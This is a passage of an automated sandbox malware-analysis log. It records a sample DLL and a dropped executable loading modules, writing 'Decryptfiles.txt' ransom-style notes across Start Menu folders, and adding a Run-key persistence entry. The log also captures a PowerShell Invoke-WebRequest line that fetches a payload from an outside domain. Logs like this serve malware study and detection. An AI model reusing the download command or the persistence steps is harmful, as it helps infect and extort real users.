Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: TD2HjoogPx.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: Z:\scvhost\Release\scvhost.pdb source: eryy65ty.exe, 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 00000014.00000000.1580004166.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001B.00000000.1754914879.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001E.00000000.1837388986.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe.14.dr
Source: Binary string: Z:\lderd\Release\lderd.pdb source: loaddll32.exe, 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp, TD2HjoogPx.dll
Source: Binary string: Z:\scvhost\Release\scvhost.pdbd source: eryy65ty.exe, 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 00000014.00000000.1580004166.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001B.00000000.1754914879.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001E.00000000.1837388986.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe.14.dr
Source: TD2HjoogPx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: TD2HjoogPx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: TD2HjoogPx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: TD2HjoogPx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: TD2HjoogPx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D408840 push ecx; ret 0_2_6D408853
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D40824F push ecx; ret 0_2_6D408262
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8E1B1 push ecx; ret 20_2_00E8E1C4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8E710 push ecx; ret 20_2_00E8E723
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\eryy65ty.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARWJump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D4073EF GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6D4073EF
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\SoftwareClient PrivateJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
